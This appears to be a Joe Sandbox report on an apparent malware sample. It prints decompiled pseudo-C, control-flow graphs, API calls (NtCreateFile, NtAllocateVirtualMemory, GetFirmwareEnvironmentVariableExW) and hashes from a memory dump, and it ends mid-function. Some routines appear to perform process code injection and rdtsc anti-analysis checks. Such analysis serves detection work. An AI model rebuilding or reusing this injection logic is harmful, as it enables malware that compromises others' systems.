                                                      Uniqueness Score: -1.00%

                                                      Function 004185DA Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 445 4185da-418631 call 4191e0 NtCreateFile
                                                      C-Code - Quality: 79%
                                                      			E004185DA(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				asm("repe imul eax, ebp, 0x5559ada2");
				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                      0x004185da
                                                      0x004185e3
                                                      0x004185ef
                                                      0x004185f7
                                                      0x0041862d
                                                      0x00418631

                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: bbe331688be3b33058041e66a7ad6c0b7015975019a23d3603797dad705e52f5
                                                      • Instruction ID: a3feab5512edf26ed73c2eb432590556f06f12dacf54985c32a390cd16232cc5
                                                      • Opcode Fuzzy Hash: bbe331688be3b33058041e66a7ad6c0b7015975019a23d3603797dad705e52f5
                                                      • Instruction Fuzzy Hash: 0A01F6B2200208ABCB48CF89CC85EEB37ADAF8C744F058208FA0C97240C630EC40CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004185E0 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 448 4185e0-4185f6 449 4185fc-418631 NtCreateFile 448->449 450 4185f7 call 4191e0 448->450 450->449
                                                      C-Code - Quality: 100%
                                                      			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                      0x004185ef
                                                      0x004185f7
                                                      0x0041862d
                                                      0x00418631

                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004187C0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 451 4187c0-4187fd call 4191e0 NtAllocateVirtualMemory
                                                      C-Code - Quality: 100%
                                                      			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                      0x004187cf
                                                      0x004187d7
                                                      0x004187f9
                                                      0x004187fd

                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00418710 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00418710(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                      0x00418713
                                                      0x00418716
                                                      0x0041871f
                                                      0x00418727
                                                      0x00418735
                                                      0x00418739

                                                      APIs
                                                      • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041870C Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 68%
                                                      			E0041870C(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				asm("out dx, eax");
				asm("invalid");
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                      0x0041870c
                                                      0x0041870d
                                                      0x00418713
                                                      0x00418716
                                                      0x0041871f
                                                      0x00418727
                                                      0x00418735
                                                      0x00418739

                                                      APIs
                                                      • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: f486950ab268172436d66976a68d9f4389135ff85c904a467cc74ed1f1dbadca
                                                      • Instruction ID: 879869b8a26302b38ede4f2345d7176c2bf9e8b2422b97e2fef801080b04498c
                                                      • Opcode Fuzzy Hash: f486950ab268172436d66976a68d9f4389135ff85c904a467cc74ed1f1dbadca
                                                      • Instruction Fuzzy Hash: 6CD02B6950D2C05FDB11FBB4A4C00C27F80EE5115871459CED4A857603D925D305D391
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004088D0 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 74%
                                                      			E004088D0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t48;
				intOrPtr _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t54;

				_t50 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t50,  &_v24); // executed
				_t52 = _t51 + 8;
				if(_t24 != 0) {
					_t40 =  &_v840;
					E00407030( &_v24,  &_v840);
					_t53 = _t52 + 8;
					do {
						_push(0x104);
						_push( &_v284);
						E0041A0F0(_t40);
						_t40 =  &_v804;
						E0041A760( &_v284,  &_v804);
						_t54 = _t53 + 0x10;
						_t48 = 0x4f;
						while(1) {
							_t31 = E00413DF0(_t40, E00413D90(_t50, _t48),  &_v284);
							_t54 = _t54 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t48 = _t48 + 1;
							if(_t48 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t50 + 0x14; // 0xffffe1a5
						_t40 =  *_t9;
						 *(_t50 + 0x474) =  *(_t50 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t53 = _t54 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t50,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t50 + 0x55c)) =  *((intOrPtr*)(_t50 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t50 + 0x31)) =  *((intOrPtr*)(_t50 + 0x31)) + _t39;
					_t20 = _t50 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t50 + 0x32)) =  *((intOrPtr*)(_t50 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                      0x004088db
                                                      0x004088e3
                                                      0x004088e5
                                                      0x004088ea
                                                      0x004088ef
                                                      0x004088f7
                                                      0x00408902
                                                      0x00408907
                                                      0x00408910
                                                      0x00408916
                                                      0x0040891b
                                                      0x0040891c
                                                      0x00408921
                                                      0x0040892f
                                                      0x00408934
                                                      0x00408937
                                                      0x00408940
                                                      0x00408952
                                                      0x00408957
                                                      0x0040895c
                                                      0x00000000
                                                      0x00000000
                                                      0x0040895e
                                                      0x00408962
                                                      0x00000000
                                                      0x00000000
                                                      0x00408964
                                                      0x00000000
                                                      0x00408962
                                                      0x00408966
                                                      0x00408966
                                                      0x00408969
                                                      0x0040896f
                                                      0x00408971
                                                      0x0040897c
                                                      0x00408981
                                                      0x00408984
                                                      0x00408991
                                                      0x0040899c
                                                      0x0040899e
                                                      0x004089a4
                                                      0x004089a8
                                                      0x004089ab
                                                      0x004089ab
                                                      0x004089b2
                                                      0x004089b5
                                                      0x004089ba
                                                      0x004089c7
                                                      0x004088f6
                                                      0x004088f6
                                                      0x004088f6

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                                      • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                                                      • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                                      • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004188B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 3 4188b0-4188e1 call 4191e0 RtlAllocateHeap
                                                      C-Code - Quality: 100%
                                                      			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                      0x004188c7
                                                      0x004188d2
                                                      0x004188dd
                                                      0x004188e1

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: 65A
                                                      • API String ID: 1279760036-2085483392
                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004188E8 Relevance: 3.0, APIs: 2, Instructions: 37memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 16%
                                                      			E004188E8(void* __eax, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t11;
				void* _t16;

				asm("lodsd");
				[far dword [gs:esi+0x6d](__eax);
				asm("stosd");
				asm("loopne 0x57");
				_t8 = _v0;
				_t3 = _t8 + 0xc74; // 0xc74
				E004191E0(_t16, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t11 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t11;
			}






                                                      0x004188e9
                                                      0x004188ea
                                                      0x004188ee
                                                      0x004188ef
                                                      0x004188f3
                                                      0x004188ff
                                                      0x00418907
                                                      0x0041891d
                                                      0x00418921

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitFreeHeapProcess
                                                      • String ID:
                                                      • API String ID: 1180424539-0
                                                      • Opcode ID: ee2feeefb7ce0a1bcb736060a899dba7e8b8439606bcab3aa9a528ee4b4b709c
                                                      • Instruction ID: 4f22fa57ed0785a79f6c586d48f860ab9e97f1efe1ba2b7e6df7fcc0c3aeee55
                                                      • Opcode Fuzzy Hash: ee2feeefb7ce0a1bcb736060a899dba7e8b8439606bcab3aa9a528ee4b4b709c
                                                      • Instruction Fuzzy Hash: 45F090B4200601BBDB15EF69CC85DA777ACEF84350F00894AF9599B342C930EA14C6F1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407710 Relevance: 1.7, APIs: 1, Instructions: 236COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 92%
                                                      			E00407710(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char* _v8;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v68;
				char _v76;
				char _v80;
				char _v84;
				char _v92;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v648;
				char _v832;
				char _v836;
				char _v1096;
				char _v1616;
				char _v1644;
				char _v1652;
				void* _t71;
				void* _t78;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t87;
				void* _t90;
				char* _t96;
				void* _t98;
				intOrPtr _t99;
				intOrPtr _t107;
				intOrPtr _t113;
				intOrPtr _t115;
				char _t116;
				void* _t119;
				intOrPtr _t131;
				intOrPtr* _t149;
				intOrPtr _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t157;

				_t151 = _a4;
				_t116 = 0; // executed
				_t71 = E00406E20(_t151,  &_v24); // executed
				_t153 = _t152 + 8;
				if(_t71 == 0) {
					L20:
					return _t116;
				}
				_t121 =  &_v1652;
				E00407030( &_v24,  &_v1652);
				_t149 = _a8;
				_t154 = _t153 + 8;
				do {
					_push(0x104);
					_push( &_v1096);
					E0041A0F0(_t121);
					E0041A760( &_v1096,  &_v1616);
					_t78 = E00413DF0( &_v1616, 0x19996921,  &_v1096);
					_t155 = _t154 + 0x18;
					if(_t78 == 0) {
						L17:
						if(_t116 != 0) {
							break;
						}
						goto L18;
					}
					_t82 = _a16;
					if(_t82 != 0x1d) {
						if(_t82 == 0x1e) {
							E00405EA0(_t151,  &_v1652);
							_t155 = _t155 + 8;
						}
						goto L17;
					}
					_t116 = 0;
					_v836 = 0;
					E0041A140( &_v832, 0, 0x328);
					_v92 = _v1644;
					_v832 = 0x10007;
					_v48 = 0x18;
					_v44 = 0;
					_v36 = 0;
					_v40 = 0;
					_v32 = 0;
					_v28 = 0;
					_v116 = 0x438;
					_t87 = E00417F90(_t151,  &_v80, 0x438,  &_v48,  &_v92);
					_t155 = _t155 + 0x20;
					_v104 = _t87;
					if(_t87 < 0) {
						goto L18;
					}
					if( *((intOrPtr*)(_t151 + 0x1c)) == 0) {
						L10:
						E004070A0( &_v24,  &_v76);
						_t90 = E0040D350(_t151,  &_v84, _v68);
						_t157 = _t155 + 0x14;
						if(_t90 != 0) {
							_t119 = 2 -  *((intOrPtr*)(_t151 + 4)) + E004199B0();
							_v8 =  *((intOrPtr*)(_t149 + 0x10)) + 2;
							E00418010(_t151, _v84,  &_v832);
							_t96 = _v8;
							 *_t96 = 0x68;
							 *((intOrPtr*)(_t96 + 1)) = _v648;
							_t98 = E0040A910(_t151,  &_v80, _t149,  *((intOrPtr*)(_t149 + 0x10)), 2);
							_t155 = _t157 + 0x20;
							if(_t98 != 0) {
								_t99 = _t98 -  *_t149;
								_v112 = _t99;
								_v648 = _t119 + _t99;
								E00418040(_t151, _v84,  &_v832);
								_v104 = E004180D0(_t151, _v84, _v648 + 5, 0, 0, 0);
								E004180A0(_t151, _v84, 0);
								E00418710(_t151, _v84);
								_push(0x32);
								_t107 = E00407310(_t151, _t149, _a12,  &_v836);
								_t155 = _t155 + 0x4c;
								_t116 = _t107;
								goto L17;
							}
							_t116 = 0;
							goto L18;
						}
						E00418710(_t151, _v80);
						_t155 = _t157 + 8;
						goto L18;
					}
					E00418180(_t151, _v80, 0x1a,  &_v836, 4, 0); // executed
					_t155 = _t155 + 0x18;
					if(_v836 != 0) {
						goto L10;
					}
					_t113 = E0040A910(_t151,  &_v80, _t149,  *((intOrPtr*)(_t149 + 0x10)), 6); // executed
					_t131 =  *((intOrPtr*)(_t149 + 0x1c));
					_t155 = _t155 + 0x14;
					_v108 = _t113;
					_v112 = _t131;
					if(_t113 != 0 && _t131 != 0) {
						_t115 = E00407540(_t151, _t149, _a12,  &_v836,  &_v1652,  &_v24); // executed
						_t155 = _t155 + 0x18;
						_t116 = _t115;
						goto L17;
					}
					L18:
					_t121 =  &_v1652;
					_t81 = E00407060( &_v24,  &_v1652);
					_t154 = _t155 + 8;
				} while (_t81 != 0);
				E004070E0(_t151,  &_v24); // executed
				goto L20;
			}

















































                                                      0x0040771b
                                                      0x00407723
                                                      0x00407725
                                                      0x0040772a
                                                      0x0040772f
                                                      0x004079be
                                                      0x004079c4
                                                      0x004079c4
                                                      0x00407736
                                                      0x00407741
                                                      0x00407746
                                                      0x00407749
                                                      0x00407750
                                                      0x00407756
                                                      0x0040775b
                                                      0x0040775c
                                                      0x0040776f
                                                      0x00407780
                                                      0x00407785
                                                      0x0040778a
                                                      0x00407990
                                                      0x00407992
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00407992
                                                      0x00407790
                                                      0x00407796
                                                      0x0040797e
                                                      0x00407988
                                                      0x0040798d
                                                      0x0040798d
                                                      0x00000000
                                                      0x0040797e
                                                      0x0040779c
                                                      0x004077ab
                                                      0x004077b1
                                                      0x004077c4
                                                      0x004077d1
                                                      0x004077db
                                                      0x004077e2
                                                      0x004077e5
                                                      0x004077e8
                                                      0x004077eb
                                                      0x004077ee
                                                      0x004077f1
                                                      0x004077f8
                                                      0x004077fd
                                                      0x00407800
                                                      0x00407805
                                                      0x00000000
                                                      0x00000000
                                                      0x0040780e
                                                      0x00407885
                                                      0x0040788d
                                                      0x0040789b
                                                      0x004078a0
                                                      0x004078a5
                                                      0x004078cc
                                                      0x004078d3
                                                      0x004078dc
                                                      0x004078e1
                                                      0x004078e4
                                                      0x004078ed
                                                      0x004078fc
                                                      0x00407901
                                                      0x00407906
                                                      0x0040790f
                                                      0x0040791f
                                                      0x00407922
                                                      0x00407928
                                                      0x0040794e
                                                      0x00407951
                                                      0x0040795b
                                                      0x00407963
                                                      0x0040796f
                                                      0x00407974
                                                      0x00407977
                                                      0x00000000
                                                      0x00407977
                                                      0x00407908
                                                      0x00000000
                                                      0x00407908
                                                      0x004078ac
                                                      0x004078b1
                                                      0x00000000
                                                      0x004078b1
                                                      0x00407821
                                                      0x00407826
                                                      0x0040782f
                                                      0x00000000
                                                      0x00000000
                                                      0x0040783d
                                                      0x00407842
                                                      0x00407845
                                                      0x00407848
                                                      0x0040784b
                                                      0x00407850
                                                      0x00407876
                                                      0x0040787b
                                                      0x0040787e
                                                      0x00000000
                                                      0x0040787e
                                                      0x00407994
                                                      0x00407994
                                                      0x0040799f
                                                      0x004079a4
                                                      0x004079a7
                                                      0x004079b4
                                                      0x00000000

                                                      APIs
                                                      • GetFirmwareEnvironmentVariableExW.KERNEL32 ref: 004078B9
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EnvironmentFirmwareVariable
                                                      • String ID:
                                                      • API String ID: 3150624800-0
                                                      • Opcode ID: dbc9e25eed92ce13272b45899ca138fbb3ed474eaf0d44580ff03372e1b25b59
                                                      • Instruction ID: e2536e021f552c15eab68d72f4fae8fca9be7580c69819dfd1917cee2ba8b8ab
                                                      • Opcode Fuzzy Hash: dbc9e25eed92ce13272b45899ca138fbb3ed474eaf0d44580ff03372e1b25b59
                                                      • Instruction Fuzzy Hash: 138141B1D00219ABEB14DF95CC81EEF77BCAF44304F04456EF608A7241E7786A55CBAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407305 Relevance: 1.7, APIs: 1, Instructions: 192threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 355 407305-40730c 357 40729b-4072ca call 41ad20 call 409b40 call 413e50 355->357 358 40730e-407368 call 41a140 call 407280 call 4199d0 355->358 371 4072cc-4072de PostThreadMessageW 357->371 372 4072fe-407302 357->372 373 407370-4073a2 call 40d3d0 call 418780 358->373 376 4072e0-4072fa call 4092a0 371->376 377 4072fd 371->377 383 4073a4-4073ac 373->383 384 4073d7-4073df 373->384 376->377 377->372 385 4073c6-4073d0 383->385 386 4073ae-4073b5 383->386 385->373 388 4073d2-4073d5 385->388 386->385 387 4073b7-4073be 386->387 387->385 389 4073c0-4073c4 387->389 390 4073fd-40740f call 418710 388->390 389->385 391 4073e0-4073fa call 41a0c0 389->391 390->384 396 407411-40747c call 417f90 390->396 391->390 396->384 399 407482-4074de call 417fd0 396->399 399->384 402 4074e4-407531 call 419670 call 419690 call 41a3b0 call 41a0c0 call 413a50 399->402
                                                      C-Code - Quality: 75%
                                                      			E00407305(void* __eflags, intOrPtr _a4, int _a8, long _a12, int _a16, intOrPtr _a85) {
				int _v8;
				char _v64;
				int _v132;
				int _v136;
				char _v656;
				int _v668;
				char _v684;
				char _v688;
				int __ebx;
				intOrPtr __edi;
				int __esi;
				void* _t63;
				int _t64;
				long _t71;
				int _t75;
				void* _t77;
				int _t84;

				_t83 = __eflags;
				[far dword [ebp-0xd]();
				asm("adc al, 0x35");
				if(__eflags >= 0) {
					E0041AD20(0x3f, 3);
					_t63 = E00409B40(_t83, _a8 + 0x1c,  &_v64); // executed
					_t64 = E00413E50(_a8 + 0x1c, _t63, 0, 0, 0xc4e7b6d6);
					_t75 = _t64;
					_t84 = _t75;
					if(_t84 != 0) {
						_t71 = _a12;
						if(_t84 < 0) {
							_t64 = PostThreadMessageW(_t71, 0x111, 0, 0); // executed
						}
						_t85 = _t64;
						if(_t64 == 0) {
							_t64 =  *_t75(_t71, 0x8003, _t77 + (E004092A0(_t85, 1, 8) & 0x000000ff) - 0x40, _t64);
						}
					}
					return _t64;
				} else {
					cs = _a85;
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x2ac;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax = 0;
					_v8 = 0;
					_v688 = 0;
					 &_v684 = E0041A140( &_v684, 0, 0x2a4);
					__esi = _a16;
					__ecx =  *((intOrPtr*)(__esi + 0x300));
					__edi = _a4;
					__eax = E00407280(__eflags, _a4,  *((intOrPtr*)(__esi + 0x300))); // executed
					__eax = E004199D0(__ecx);
					_t15 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
					__ebx = __eax + _t15;
					_a16 = 0;
					while(1) {
						__eax = E0040D3D0(__edi, 0xfe363c80); // executed
						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
						__eax =  &_v688;
						__eax = E00418780(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
						 *(__esi + 0x2dc) = __eax;
						__eflags = __eax;
						if(__eax < 0) {
							break;
						}
						__eflags = _v656;
						if(_v656 == 0) {
							L16:
							__eax = _a16;
							__eax = _a16 + 1;
							_a16 = __eax;
							__eflags = __eax - 2;
							if(__eax < 2) {
								continue;
							} else {
								__ebx = _v8;
								goto L20;
							}
						} else {
							__eflags = _v668;
							if(_v668 == 0) {
								goto L16;
							} else {
								__eflags = _v136;
								if(_v136 == 0) {
									goto L16;
								} else {
									__eflags = _v132;
									if(_v132 != 0) {
										__eax = _a12;
										__edx =  &_v688;
										__ebx = 1;
										__eax = E0041A0C0(_a12,  &_v688, 0x2a8);
										L20:
										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
										__eax = E00418710(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										} else {
											__edx = _v668;
											__eax = _a12;
											__ecx = _v136;
											 *(_a12 + 0x14) = _v668;
											__edx =  *(__esi + 0x2d0);
											_t35 = __esi + 0x2e8; // 0x2e8
											__eax = _t35;
											 *_t35 = _v136;
											__eax = _a12;
											_t37 = __esi + 0x314; // 0x314
											__ebx = _t37;
